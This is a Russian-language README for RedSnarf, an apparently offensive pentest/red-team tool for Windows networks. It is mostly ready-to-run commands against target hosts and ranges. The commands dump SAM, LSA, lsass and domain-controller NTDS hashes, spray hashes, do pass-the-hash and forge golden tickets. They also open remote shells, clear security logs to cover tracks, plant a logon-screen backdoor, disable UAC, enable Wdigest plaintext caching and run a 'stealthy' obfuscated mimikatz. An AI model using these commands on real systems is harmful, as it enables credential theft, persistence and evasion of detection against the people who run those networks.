
RedSnarf — это инструмент для пентеста / ред-тиминга, предназначенный для сред Windows.
______ .____________ _____
\______ \ ____ __| _/ _____/ ____ _____ ________/ ____\
| _// __ \ / __ |\_____ \ / \\__ \\_ __ \ __\
| | \ ___// /_/ |/ \ | \/ __ \| | \/| |
|____|_ /\___ >____ /_______ /___| (____ /__| |__|
\/ \/ \/ \/ \/ \/
[email protected]
@redsnarf
RedSnarf — это инструмент для пентестинга / red-команд от Ed Williams, предназначенный для извлечения хэшей и учётных данных с рабочих станций, серверов и контроллеров домена Windows с использованием методов, безопасных для OpSec.
Смотрите наш канал на YouTube с видео: https://www.youtube.com/channel/UCDGWRxpHo6d8y6qIeMAXnxQ
Функциональность RedSnarf включает:
• Извлечение локальных SAM-хэшей
• Перечисление пользователей, работающих с повышенными привилегиями системы, и соответствующих паролей lsa secrets
• Извлечение кэшированных учётных данных MS
• Pass-the-hash
• Быстрое определение слабых и подбираемых комбинаций имя пользователя/пароль (по умолчанию administrator/Password01)
• Возможность извлекать хэши в диапазоне адресов
• Распыление хэшей —
Credsfile принимает смесь pwdump, fgdump и простых текстовых имён пользователей и паролей, разделённых пробелом
• Дамп lsass для офлайн-анализа с помощью Mimikatz
• Дамп хэшей контроллера домена с помощью NTDSUtil и извлечение NTDS.dit для локального разбора
• Дамп хэшей контроллера домена методом drsuapi
• Извлечение папки Scripts и Policies с контроллера домена и поиск в ней 'password' и 'administrator'
• Возможность расшифровки хэшей cpassword
• Возможность запуска оболочки на удалённой машине
• Возможность очистки журналов событий (приложение, безопасность, установка или система); (только во внутренней версии)
• Результаты сохраняются по каждому хосту для анализа
• Включение/отключение RDP на удалённой машине
• Изменение порта RDP с 3389 на 443 на удалённой машине
• Включение/отключение NLA на удалённой машине
• Поиск мест, где пользователи вошли в систему на удалённых машинах
• Бэкдор на экране входа Windows
• Включение/отключение UAC на удалённой машине
• Добавлен скрытный mimikatz
• Разбор доменных хэшей
• Определение, какие учётные записи включены/отключены
• Снятие скриншота рабочего стола активного удалённого пользователя
• Запись рабочего стола активного удалённого пользователя
• Расшифровка Windows CPassword
• Расшифровка пароля WinSCP
• Получение SPN пользователя
• Извлечение паролей Wi-Fi с удалённых машин
Требования:
Impacket v0.9.16-dev — https://github.com/CoreSecurity/impacket.git
CredDump7 — https://github.com/Neohapsis/creddump7
Извлечение lsass с помощью procdump — https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
Netaddr (0.7.12) — pip install netaddr
Termcolor (1.1.0) — pip install termcolor
iconv — используется для локального разбора информации Mimikatz
Показать справку
./redsnarf.py -h
./redsnarf.py --help
Извлечение локальных хэшей с одной машины, используя слабые локальные учётные данные и очистка журнала безопасности
./redsnarf.py -H ip=10.0.0.50 -uC security
Извлечение локальных хэшей с одной машины, используя слабые локальные учётные данные и очистка журнала приложений
./redsnarf.py -H ip=10.0.0.50 -uC application
Извлечение локальных хэшей с одной машины, используя учётные данные локального администратора
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d .
Извлечение локальных хэшей с одной машины, используя учётные данные администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com
Извлечение хэшей в сетевом диапазоне, используя учётные данные локального администратора
./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d .
Извлечение хэшей в сетевом диапазоне, используя учётные данные администратора домена
./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com
Извлечение хэшей в сетевом диапазоне, используя учётные данные администратора домена
./redsnarf.py -H file=targets.txt -u administrator -p Password01 -d yourdomain.com
Распыление хэшей в сетевом диапазоне
./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d .
Извлечение хэшей в сетевом диапазоне с доменным входом
./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d yourdomain.com
Быстрая проверка учётных данных
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password1 -d . -cQ y
Быстрая проверка файла с именами пользователей (-hS) и общим паролем (-hP)
./redsnarf.py -H ip=10.0.0.1 -hS /path/to/usernames.txt -hP PasswordToTry -cQ y
Извлечение хэшей методом drsuapi (самый быстрый)
Этот метод поддерживает дополнительный флаг -q y, который запрашивает LDAP и выводит, активны учётные записи или отключены.
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hI y (-hQ y)
Извлечение хэшей с помощью NTDSUtil
Этот метод поддерживает дополнительный флаг -q y, который запрашивает LDAP и выводит, активны учётные записи или отключены.
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hN y (-hQ y)
Генерация золотого билета
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hT y
Копирование папки Policies и Scripts с контроллера домена и поиск в ней password и administrator
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -uP y
Расшифровка Cpassword
./redsnarf.py -uG cpassword
Поиск пользователя — онлайн
/redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eL user.name
Поиск пользователя — офлайн (поиск по предварительно загруженной информации)
/redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eO user.name
Вывод списка задач NT AUTHORITY\SYSTEM
/redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -eT y
Снимок экрана рабочего стола удалённого активного пользователя
/redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -eS y
Запуск оболочки на машине, используя учётные данные локального администратора
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -uD y
Запуск оболочки на машине, используя учётные данные администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uD y
Извлечение копии lsass для офлайн-анализа с Mimikatz на машине, используя учётные данные локального администратора
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -hL y
Запуск скрытного mimikatz; этот вариант запускает веб-сервер для предоставления PowerShell-скрипта, который обфусцирован и закодирован на стороне машины; данные не касаются диска — учётные данные извлекаются в удобном для чтения виде и выводятся на экран.
./redsnarf.py -H ip=192.168.198.162 -u administrator -p Password01 -cS y -hR y
Выполнение произвольной команды
Пример 1
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uX 'net user'
Пример 2 — Двойные кавычки нужно экранировать с помощью \
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uX 'dsquery group -name "domain admins" | dsget group -members -expand'
Политика локального маркера доступа
Создаёт пакетный файл lat.bat, который можно скопировать и вставить на удалённую машину для выполнения; он изменит реестр и включит или отключит параметры политики локального маркера доступа.
./redsnarf.py -rL y
Wdigest
Включение значения реестра UseLogonCredential Wdigest на машине с использованием учётных данных администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW e
Отключение значения реестра UseLogonCredential Wdigest на машине с использованием учётных данных администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW d
Запрос значения реестра UseLogonCredential Wdigest на машине с использованием учётных данных администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW q
UAC
Включение значения реестра UAC на машине с использованием учётных данных администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU e
Отключение значения реестра UAC на машине с использованием учётных данных администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU d
Запрос значения реестра UAC на машине с использованием учётных данных администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU q
Бэкдор — Бэкдор на экране входа Windows — нажмите Left Shift + Left Alt + Print Screen для активации
Включение значения реестра бэкдора на машине с использованием учётных данных администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB e
Отключение значения реестра бэкдора на машине с использованием учётных данных администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB d
Запрос значения реестра бэкдора на машине с использованием учётных данных администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB q
Автовход
Включение значения реестра Windows AutoLogon на машине с использованием учётных данных администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA e
Отключение значения реестра Windows AutoLogon на машине с использованием учётных данных администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA d
Запрос значения реестра Windows AutoLogon на машине с использованием учётных данных администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA q
Блокировка сеанса пользователя на удалённой машине с использованием учётных данных администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uL y
Включение RDP на машине с использованием учётных данных администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR e
Отключение RDP на машине с использованием учётных данных администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR d
Запрос статуса RDP на машине с использованием учётных данных администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR q
Изменение порта RDP с 3389 на 443 — Изменить порт RDP на 443 на машине с использованием учётных данных администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT e
Изменение порта RDP на значение по умолчанию 3389 на машине с использованием учётных данных администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT d
Запрос значения порта RDP на машине с использованием учётных данных администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT q
Включение мульти-RDP с Mimikatz
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uR y
Включение RDP SingleSessionPerUser на машине с использованием учётных данных администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM e
Отключение RDP SingleSessionPerUser на машине с использованием учётных данных администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM d
Запрос статуса RDP SingleSessionPerUser на машине с использованием учётных данных администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM q
Включение NLA на машине с использованием учётных данных администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN e
Отключение NLA на машине с использованием учётных данных администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN d
Запрос статуса NLA на машине с использованием учётных данных администратора домена
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN q